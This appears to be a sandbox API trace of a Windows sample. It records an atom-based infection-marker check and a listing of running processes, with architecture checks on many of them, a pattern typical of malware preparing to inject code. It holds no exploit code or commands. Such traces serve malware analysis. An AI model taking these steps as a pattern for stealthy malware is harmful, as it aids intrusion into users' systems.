	[0133.043] GetLastError () returned 0x5
	[0133.043] GetLastError () returned 0x5
	[0133.043] GetLastError () returned 0x5
	[0133.043] GetLastError () returned 0x5
	[0133.043] GetLastError () returned 0x5
	[0133.043] GetLastError () returned 0x5
	[0133.043] GetLastError () returned 0x5
	[0133.043] GetLastError () returned 0x5
	[0133.043] GetLastError () returned 0x5
	[0133.043] GetLastError () returned 0x5
	[0133.043] GetLastError () returned 0x5
	[0133.044] GetLastError () returned 0x5
	[0133.044] wsprintfA (in: param_1=0x3993380, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0133.044] GetLastError () returned 0x5
	[0133.044] GetLastError () returned 0x5
	[0133.044] GetLastError () returned 0x5
	[0133.044] GetLastError () returned 0x5
	[0133.044] GetLastError () returned 0x5
	[0133.044] GetLastError () returned 0x5
	[0133.044] GetLastError () returned 0x5
	[0133.044] GetLastError () returned 0x5
	[0133.044] GetLastError () returned 0x5
	[0133.044] GetLastError () returned 0x5
	[0133.044] GetLastError () returned 0x5
	[0133.044] GetLastError () returned 0x5
	[0133.044] GetLastError () returned 0x5
	[0133.044] GetLastError () returned 0x5
	[0133.044] GetLastError () returned 0x5
	[0133.044] GetLastError () returned 0x5
	[0133.044] GetLastError () returned 0x5
	[0133.044] GetLastError () returned 0x5
	[0133.044] GetLastError () returned 0x5
	[0133.044] GetLastError () returned 0x5
	[0133.044] GetLastError () returned 0x5
	[0133.044] GetLastError () returned 0x5
	[0133.044] GetLastError () returned 0x5
	[0133.044] GetLastError () returned 0x5
	[0133.044] GetLastError () returned 0x5
	[0133.044] GetLastError () returned 0x5
	[0133.044] GetLastError () returned 0x5
	[0133.044] GetLastError () returned 0x5
	[0133.044] GetLastError () returned 0x5
	[0133.044] GetLastError () returned 0x5
	[0133.044] GetLastError () returned 0x5
	[0133.044] GetLastError () returned 0x5
	[0133.044] GetLastError () returned 0x5
	[0133.044] GetLastError () returned 0x5
	[0133.044] GetLastError () returned 0x5
	[0133.044] GetLastError () returned 0x5
	[0133.044] GetLastError () returned 0x5
	[0133.044] GetLastError () returned 0x5
	[0133.044] GetLastError () returned 0x5
	[0133.044] GetLastError () returned 0x5
	[0133.044] GetLastError () returned 0x5
	[0133.044] GetLastError () returned 0x5
	[0133.044] GetLastError () returned 0x5
	[0133.045] GetLastError () returned 0x5
	[0133.045] GetLastError () returned 0x5
	[0133.045] GetLastError () returned 0x5
	[0133.045] GetLastError () returned 0x5
	[0133.045] GetLastError () returned 0x5
	[0133.045] GetLastError () returned 0x5
	[0133.045] GetLastError () returned 0x5
	[0133.045] GetLastError () returned 0x5
	[0133.045] GetLastError () returned 0x5
	[0133.045] GetLastError () returned 0x5
	[0133.045] GetLastError () returned 0x5
	[0133.045] GetLastError () returned 0x5
	[0133.045] GetLastError () returned 0x5
	[0133.045] GetLastError () returned 0x5
	[0133.045] GetLastError () returned 0x5
	[0133.045] GetLastError () returned 0x5
	[0133.045] GetLastError () returned 0x5
	[0133.045] GetLastError () returned 0x5
	[0133.045] GetLastError () returned 0x5
	[0133.045] GetLastError () returned 0x5
	[0133.045] GetLastError () returned 0x5
	[0133.045] GetLastError () returned 0x5
	[0133.045] GetLastError () returned 0x5
	[0133.045] GetLastError () returned 0x5
	[0133.045] GetLastError () returned 0x5
	[0133.045] GetLastError () returned 0x5
	[0133.045] GetLastError () returned 0x5
	[0133.045] GetLastError () returned 0x5
	[0133.045] GetLastError () returned 0x5
	[0133.045] GetLastError () returned 0x5
	[0133.045] GetLastError () returned 0x5
	[0133.045] GetLastError () returned 0x5
	[0133.045] GetLastError () returned 0x5
	[0133.045] GetLastError () returned 0x5
	[0133.045] GetLastError () returned 0x5
	[0133.045] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0133.046] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0133.046] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0133.046] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0133.046] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0133.046] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0133.046] CloseHandle (hObject=0x2dc) returned 1
	[0133.046] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0133.046] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sppsvc.exe", cchWideChar=10, lpMultiByteStr=0x39b5a48, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 10
	[0133.047] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.047] CloseHandle (hObject=0x2dc) returned 1
	[0133.047] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="cmd.exe", cchWideChar=7, lpMultiByteStr=0x69d668, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cmd.exe", lpUsedDefaultChar=0x0) returned 7
	[0133.047] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.047] CloseHandle (hObject=0x2dc) returned 1
	[0133.047] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x39b5970, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0133.047] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.047] CloseHandle (hObject=0x2dc) returned 1
	[0133.048] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="conhost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b80, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.048] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.048] CloseHandle (hObject=0x2dc) returned 1
	[0133.048] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PING.EXE", cchWideChar=8, lpMultiByteStr=0x39b5c10, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PING.EXE", lpUsedDefaultChar=0x0) returned 8
	[0133.048] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.048] CloseHandle (hObject=0x2dc) returned 1
	[0133.049] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x399d128, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0133.079] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x286ff10 | out: SystemInformation=0x0, ResultLength=0x286ff10*=0x16d28) returned 0xc0000004
	[0133.080] VirtualAlloc (lpAddress=0x0, dwSize=0x16e28, flAllocationType=0x3000, flProtect=0x4) returned 0x3c30000
	[0133.080] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3c30000, Length=0x16e28, ResultLength=0x0 | out: SystemInformation=0x3c30000, ResultLength=0x0) returned 0x0
	[0133.082] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0133.082] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x39b5bb0, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0133.082] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x39b5c10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0133.082] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x39b5a48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.083] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x39b5b08, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0133.083] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x39b5970, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0133.083] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x39b5c10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0133.083] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x39b5b98, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0133.083] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.083] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.084] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x69d5d8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0133.084] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.084] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b59e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.084] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.084] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.085] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.085] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.085] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b80, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.085] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x39b59e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.085] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.085] CloseHandle (hObject=0x2dc) returned 1
	[0133.086] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x39b5b98, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0133.086] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.086] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x399d128, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0133.086] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.086] CloseHandle (hObject=0x2dc) returned 1
	[0133.086] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x399d188, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0133.087] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.087] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.087] CloseHandle (hObject=0x2dc) returned 1
	[0133.087] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x39b5b98, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0133.087] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.087] CloseHandle (hObject=0x2dc) returned 1
	[0133.087] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x39b5b08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0133.088] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.088] CloseHandle (hObject=0x2dc) returned 1
	[0133.088] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x39b5970, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0133.088] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.088] CloseHandle (hObject=0x2dc) returned 1
	[0133.088] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x399d128, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0133.089] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.089] CloseHandle (hObject=0x2dc) returned 1
	[0133.089] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x39b5b08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0133.089] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.089] CloseHandle (hObject=0x2dc) returned 1
	[0133.089] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.089] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x39b59e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.090] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.090] CloseHandle (hObject=0x2dc) returned 1
	[0133.090] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x39b5970, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0133.090] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.090] CloseHandle (hObject=0x2dc) returned 1
	[0133.090] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.090] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.091] CloseHandle (hObject=0x2dc) returned 1
	[0133.091] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x399d188, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0133.091] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.091] CloseHandle (hObject=0x2dc) returned 1
	[0133.091] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x69d578, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0133.091] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.091] CloseHandle (hObject=0x2dc) returned 1
	[0133.092] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x399d128, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0133.092] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.092] CloseHandle (hObject=0x2dc) returned 1
	[0133.092] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x39b9708, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0133.092] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.092] CloseHandle (hObject=0x2dc) returned 1
	[0133.092] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x399d188, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0133.093] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.093] CloseHandle (hObject=0x2dc) returned 1
	[0133.093] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x39b5b80, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0133.093] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.093] CloseHandle (hObject=0x2dc) returned 1
	[0133.093] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x39b59e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.093] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.093] CloseHandle (hObject=0x2dc) returned 1
	[0133.094] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x399d128, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0133.094] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.094] CloseHandle (hObject=0x2dc) returned 1
	[0133.094] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x399d128, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0133.094] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.094] CloseHandle (hObject=0x2dc) returned 1
	[0133.094] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x39b5b80, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0133.095] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.095] CloseHandle (hObject=0x2dc) returned 1
	[0133.095] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x39b5b80, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0133.095] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.095] CloseHandle (hObject=0x2dc) returned 1
	[0133.095] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x39b9938, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0133.096] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.096] CloseHandle (hObject=0x2dc) returned 1
	[0133.096] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x39b5b50, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0133.096] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.096] CloseHandle (hObject=0x2dc) returned 1
	[0133.096] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x39b5a78, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0133.096] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.096] CloseHandle (hObject=0x2dc) returned 1
	[0133.097] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x399d128, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0133.097] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.097] CloseHandle (hObject=0x2dc) returned 1
	[0133.097] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x39b5b08, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0133.097] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.097] CloseHandle (hObject=0x2dc) returned 1
	[0133.097] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x399d128, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0133.098] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.098] CloseHandle (hObject=0x2dc) returned 1
	[0133.098] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x39b97a8, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0133.098] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.098] CloseHandle (hObject=0x2dc) returned 1
